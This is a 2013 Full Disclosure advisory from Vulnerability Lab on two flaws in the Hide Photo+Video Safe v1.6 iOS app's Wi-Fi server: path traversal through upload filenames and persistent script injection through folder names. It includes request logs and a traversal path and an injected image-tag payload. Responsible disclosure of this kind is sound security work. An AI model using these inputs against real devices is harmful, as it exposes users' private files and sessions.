Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Hide Photo+Video Safe v1.6 iOS - Multiple Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Thu, 03 Oct 2013 02:25:20 +0200

Title:
======
Hide Photo+Video Safe v1.6 iOS - Multiple Vulnerabilities


Date:
=====
2013-09-22


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1083


VL-ID:
=====
1083


Common Vulnerability Scoring System:
====================================
6.7


Introduction:
=============
With it, you can lock and manage your private photos & videos very easily! Yyou can protect your privacy very 
securely with lots of features! Support dot lock & password lock!

Manage Folders
- Create, Cut, Copy, Delete, Rename, Search folders
- Hide, encrypt folders
- Multiple folders can be handled at a time

Manage Files
- Add photos, videos from computer, camera or photo library
- Sort by Date, Type, Name, Size, Ascending or Descending(click again to switch)
- Cut, Copy, Delete, Rename, Search, Hide files
- Multiple files can be handled at a time

Support Viewing many file formats
- Photo: jpg, png, bmp, gif, tif, tiff, jpeg
- Video: mov, mp4, m4v, mpv

Security
- You can lock/unlock the app with password
- Support decoy accounts to protect your real privacy
- With only one password, you can easily lock or unlock any folder
- With the password of the current user, you can hide or show any folder/file
- The Q&A for password resetting can be added or modified optionally

Communicate with computer
- Wi-Fi web access for download and upload. Support viewing files on browser and uploading multiple files at a time.
- USB Import/Export multiple folders or files from/to iTunes File Sharing
- You can store any media file you like, the importing files will be sorted automatically into 2 kinds: Photo, Video
- The exporting files/folders will be merged into one folder called Export in iTunes. 
- For security reason, they will be moved back to app once you stop exporting
- Import/Export multiple folders or files from/to iTunes in current directory simply 


(Copy of the Homepage:  https://itunes.apple.com/de/app/hide-photo+video-safe-free/id463142728 )


Abstract:
=========
The Vulnerability Laboratory discovered multiple web vulnerabilities in the Hide Photo+Video Safe - Dot Lock Private 
Photos Vault 1.6 iOS application.


Report-Timeline:
================
2013-09-22:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Hide Photo+Video Safe - Dot Lock Private Photos Vault 1.6


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A local file/path include web vulnerability is detected in the Hide Photo+Video Safe - Dot Lock Private Photos Vault 
1.6 iOS application.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise 
the application or service.

The vulnerability is located in the uploadify/swfobject.js file when processing to add (upload) files with manipulated 
filenames as picture 
via POST method request. The attacker can inject local path or files to request resources and compromise the mobile 
device or web service. 
The validation has a bad side effect which impacts the risk to combine the attack with persistent injected script code.

Exploitation of the local file include web vulnerability requires no user interaction or privilege application user 
account with password. 
Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the 
device or application.

Vulnerable Application(s):
                                [+] Hide Photo+Video Safe v1.6 iOS - ITunes or AppStore (Apple)

Vulnerable Module(s):
                                [+] File Upload - (http://localhost:5555/uploadify/swfobject.js )

Vulnerable Parameter(s):
                                [+] filename (picture|image)

Affected Module(s):
                                [+] Index File Dir Listing (http://localhost:5555/?../../../[x])



1.2
A persistent input validation web vulnerability is detected in the Hide Photo+Video Safe - Dot Lock Private Photos 
Vault 1.6 iOS application.
The bug allows remote attackers to implement/inject own malicious persistent script codes (application side) via POST 
method.

The vulnerability is located in the `Add Folder` module of the web-server interface (http://localhost:555) when 
processing to 
add via POST method manipulated `folder names`. The folder name will be changed to the path value without secure 
filter, encode or 
parse mechanism. The injected script code gets executed in the main index file dir folder listing of the mobile 
application.

Exploitation of the persistent web vulnerability requires low user interaction and no privilege application user 
account with a password. 
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via 
persistent web attacks, 
persistent phishing or persistent module context manipulation.

Vulnerable Application(s):
                                [+] Hide Photo+Video Safe v1.6 iOS - ITunes or AppStore (Apple)

Vulnerable Module(s):
                                [+] Add Folder

Vulnerable Parameter(s):
                                [+] foldername
                                [+] path

Affected Module(s):
                                [+] Path Dir Listing (http://localhost:5555/[x])


Proof of Concept:
=================
1.1
The local file include web vulnerability can be exploited by remote attackers without privileged application user 
account 
and also without user interaction. For demonstration or reproduce ...


--- PoC Request/Response Session Log ---
Status: 200[OK]

GET http://localhost:5555/TLI?/Picture/\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] 
Load Flags[VALIDATE_ALWAYS ] Content Size[3372] Mime Type[application/x-unknown-content-type]
   
Request Headers:
Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:5555/]
Connection[keep-alive]

Response Headers:
Accept-Ranges[bytes]
Content-Length[3372]
Date[Sa., 21 Sep 2013 20:38:08 GMT]
Status: Loaded from cache[Loaded from cache]
GET http://localhost:5555/img/uploadify.swf 
Load Flags[LOAD_FROM_CACHE  ] Content Size[-1] Mime Type[unknown]
   
Request Headers:
Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
  

Response Headers:
Status: Loaded from cache[Loaded from cache]
GET http://localhost:5555/uploadify/swfobject.js 
Load Flags[LOAD_FROM_CACHE  ] 
Content Size[-1] 
Mime Type[unknown]
Request Headers: Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

Response Headers:
Status: Loaded from cache[Loaded from cache]
GET http://localhost:5555/TLI?/Picture/\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] 
Load Flags[LOAD_FROM_CACHE  ] Content Size[-1] 
Mime Type[unknown]

Request Headers:
Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]


PoC: File Include as File Name (Image)

<div style="height: 516px;" class="content" id="content"><table><tbody><tr><td><div class="itemFrame" id="0">
<div class="imageFrame"><img src="My%20Media%20WiFi

%20Manager_files/TLI.png" class="image" id="0"></div><div style="height:20px; overflow:hidden;" align="center">
<label class="name">\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] </label></div><div align="center"><a href="#" 
class="command" id="del_0">delete</a>
<a class="command" href="http://localhost:5555/DNL?/Picture/\\../../[FILE INCLUDE VIA LOCAL PATH REQUEST!] 
">download</a></div></div></td>
<td><div class="itemFrame" id="1"><div class="imageFrame"><img src="My%20Media%20WiFi%20Manager_files/TLI_002.png" 
class="image" id="1"></div>
<div style="height:20px; overflow:hidden;" align="center"><label class="name">s21</label></div><div align="center">
<a href="#" class="command" id="del_1">delete</a><a class="command" 

href="http://localhost:5555/DNL?/Picture/asdasd/s21.png";>download</a></div></div></td></tr></tbody></table></div>


Reference(s):
http://localhost:5555/#
http://localhost:5555/Picture/[PATH!]




1.2
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application 
user account 
and with low user interaction. For demonstration or reproduce ...


Payload:        </>%20<img%20src=http://www.vulnerability-lab.com/x.*>


--- PoC Request/Response Session Log ---
Status: 200[OK]
GET http://localhost:5555/ADD?/Picture/ 
Load Flags[LOAD_BACKGROUND  ] 
Content Size[43] 
Mime Type[application/x-unknown-content-type]
   

Request Headers:
Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[application/json, text/javascript, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With
[XMLHttpRequest]
Referer[http://localhost:5555/]
Connection[keep-alive]

Response Headers:
Accept-Ranges[bytes]
Content-Length[43]     
Date [Sa., 21 Sep 2013 20:30:38 GMT]


Status: 200[OK] 
GET http://localhost:5555/a 
Load Flags[LOAD_DOCUMENT_URI  ] 
Content Size[0] 
Mime Type[application/x-unknown-content-type]
   
Request Headers:
Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:5555/]
Connection[keep-alive]

Response Headers:
Accept-Ranges[bytes]
Content-Length[0]    
Date[Sa., 21 Sep 2013 20:30:38 GMT]


PoC: Add Folder of Pictures - Folder/Path Name

<div class="itemFrame" id="1"><div class="imageFrame"><img src="/TLI?/Picture/asdasd/s21.png" 
class="image" id="1"></div><div style="height:20px; overflow:hidden;" align="center">
<label class="name">s21</label></div><div align="center"><a href="#" class="command" id="del_1">delete</a><a 
class="command" href="DNL?/Picture/asdasd/s21.png">download</a></div></div>


Reference(s):
http://localhost:5555/PRE?/Picture
http://localhost:5555/TLI?/Picture/[PATH]/
http://localhost:5555/ADD?/Picture/


Solution:
=========
1.1
The file include web vulnerability can be patched by a secure encoding and filter restriction of the file-names. 
Also encode and parse the vulnerable path listing value. Implement a secure exception-handling to filter and prevent 
malicious executions.

1.2
The persistent input validation web vulnerability can be patched by a secure encoding of the add folder function input.
Also encode and parse the output listing in the main index and sub folders.


Risk:
=====
1.1
The security risk of the local file include web vulnerability is estimated as high(+).

1.2
The security risk of the persistent input validation web vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com            - admin () evolution-sec 
com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, 
videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, 
list (feed), 
modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a 
permission.

                                Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Hide Photo+Video Safe v1.6 iOS - Multiple Vulnerabilities Vulnerability Lab (Oct 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]